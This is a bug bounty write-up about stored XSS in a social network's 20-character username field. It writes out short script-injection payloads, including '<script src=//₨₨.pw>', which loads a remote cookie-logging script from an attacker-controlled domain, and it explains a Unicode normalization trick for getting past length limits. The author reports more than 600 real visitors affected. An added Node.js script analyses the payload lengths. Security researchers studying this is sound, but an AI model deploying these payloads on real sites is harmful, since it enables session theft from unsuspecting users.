Hey there :)
This is my first write-up. I decided to share this story because I spent nights on it and finally found a solution to my problem.
The story:
I was invited some months ago to a private Bugcrowd program that was going to start a few days later.
I found some bugs and took a break.
During the last 5 days of the program I told myself I had to find some bugs before it ended (I want $$ boiiii), so I took another look at the program.
Checked the scope again, etc.
This private program was a big social network (can’t tell the name, it’s private bruh), but the point is I went to create a new account.
Username: I entered an XSS payload, but no special characters were allowed: <:’();?>, and the field was limited to 20 characters:
So I forgot about XSS and looked for other bugs.
Later I visited the 2nd in-scope domain, which was another social media site, and tried to create a new account using my email, but I got an error: User already registered, please login. What happened? It seems the 2 sites use the same database, so you can use the same account on both sites.
So I logged in, moved to my profile and thought I would try to edit my username there; I was surprised that no characters were restricted :D
I was like :
But this field is limited to 20 chars too :(
I first entered a simple payload to confirm the XSS: <svg/onload=alert()> = 20 chars
I saved it and visited my profile on the main site (I wanted it to work on the main site because the bounties there were higher). And boom, the alert box appeared :D
Now that the XSS was valid, it was time to work on an XSS payload to log the cookies of whoever visits my profile, because remember: the higher the security impact, the higher the bounty will be, thanks master Yoda.
But the problem was: how to enter a valid 20-char XSS payload to log cookies? The XSS Hunter tool is useful but its payloads are way too long, so I started digging every night, and after 48 hours I found this tweet with this short payload from @0x6D6172696F:
<script/src=//⑭.₨> = 18 chars (₨ is the Rupee sign, U+20A8: the length check counts it as 1 char, but the browser’s hostname processing (the IDNA/NFKC compatibility mapping) turns it into the 2 ASCII letters "rs" before resolving the domain. Same for ⑭, which becomes "14".)
But it said Edge only, so I told myself I had nothing to lose and entered this payload in Chrome and Firefox, and boom: the XSS triggered.
Now I had to rent a (2 digits).rs domain for the PoC, but the prices are quite high for me (approx. 90 USD), so I asked myself how I could reach the highest impact without spending 90 USD.
After some days I had an idea: I went straight to namecheap.com (thanks to @brutelogic) to check for the cheapest 2-char TLD and found .pw, so I checked RsRs.pw: it was 90 cents/year :D So the domain + DNS = approx. $2.10
I went straight to the panel and redirected rsrs.pw to my XSS Hunter link, (name).xsshunter.com, where my blind XSS payload is hosted, returned to the site and created this payload: <script src=//₨₨.pw> = 20 chars. Saved it, visited my profile, and boom:
Me, talking to myself :
After 1 month (until they fixed it) I had 600+ victims without doing anything (I kept receiving emails from XSS Hunter) and a $1000+ bounty :)
I know this is long, but I can’t summarize 5 nights of work in 10 lines ^^
- When you see a character limit, or when a character is restricted somewhere, try to embed 2 chars into 1 (a Unicode compatibility character that the browser normalizes to two ASCII characters, like ₨ → rs or ⑭ → 14), or look through another script such as the Greek alphabet for a look-alike character.
- Sometimes you can go to an out-of-scope domain or a lower-bounty domain to get a valid bug, or a higher-bounty bug on the main domain.
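As an added example (this is not code from the original write-up), here is a small Node.js script that checks the two things the story relies on: how long each payload is depending on how the characters are counted, and why <script src=//₨₨.pw> and the tweet’s <script/src=//⑭.₨> end up loading from rsrs.pw and 14.rs. The payload strings are the ones quoted above; the base URL https://example.invalid/ is a placeholder standing in for the vulnerable site. mapHostname() reproduces only the mapping step of the IDNA (UTS #46) processing browsers run on a hostname, NFKC normalization plus case folding; resolvedHost() cross-checks it with the WHATWG URL parser built into Node, which performs the real IDNA processing.

```javascript
// Added example, not from the original write-up. Shows why a compatibility
// character such as ₨ (U+20A8) or ⑭ (U+2473) counts as one character against a
// length limit but turns into two ASCII letters/digits once a browser resolves
// the hostname, which is what let a 20-char payload reach a real domain.

// The three payloads from the write-up, exactly as written there.
const PAYLOADS = {
  confirm: '<svg/onload=alert()>',   // 20 chars, proof-of-concept alert
  tweet:   '<script/src=//⑭.₨>',    // 18 chars, payload from the tweet
  final:   '<script src=//₨₨.pw>',  // 20 chars, payload actually used
};

// Length under the three counts a server-side limit might use: UTF-16 code
// units (JavaScript's .length), Unicode code points, and UTF-8 bytes.
// A byte-based limit would have rejected both Unicode payloads.
function payloadLengths(s) {
  return {
    utf16Units: s.length,
    codePoints: [...s].length,
    utf8Bytes: new TextEncoder().encode(s).length,
  };
}

// Does the payload fit a limit counted in characters (code points), which is
// what the 20-char username field accepted?
function fitsLimit(s, limit = 20) {
  return [...s].length <= limit;
}

// Pull the host out of a scheme-relative src=//host attribute value;
// null when the payload has no src (the svg/onload one).
function srcHost(payload) {
  const m = /src=\/\/([^\s>]+)/.exec(payload);
  return m ? m[1] : null;
}

// The mapping step of IDNA (UTS #46) that browsers apply before resolution:
// NFKC compatibility normalization, then case folding.
// NFKC maps ₨ to "Rs" and ⑭ to "14", so "₨₨.pw" becomes "rsrs.pw".
function mapHostname(host) {
  return host.normalize('NFKC').toLowerCase();
}

// Cross-check with the WHATWG URL parser, which does the full IDNA processing.
// https://example.invalid/ is a placeholder base for the vulnerable page; a
// scheme-relative //host inherits its scheme, exactly as in the real payload.
function resolvedHost(payload) {
  return new URL('//' + srcHost(payload), 'https://example.invalid/').hostname;
}

// Report for every payload: length counts, whether it fits the 20-char limit,
// the literal host in the payload, and where the browser really loads from.
function report() {
  const out = {};
  for (const [name, p] of Object.entries(PAYLOADS)) {
    const host = srcHost(p);
    out[name] = {
      ...payloadLengths(p),
      fits20: fitsLimit(p),
      host,
      mapped: host ? mapHostname(host) : null,
      resolved: host ? resolvedHost(p) : null,
    };
  }
  return out;
}

console.table(report());
```

Run it with node: the table shows the final payload at 20 code points (24 UTF-8 bytes) and both the NFKC mapping and the URL parser turning ₨₨.pw into rsrs.pw, which is why a cheap .pw domain could stand in for the (2 digits).rs one.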
Thank you for reading,
Daher Mohamed aka m0m0x01d :)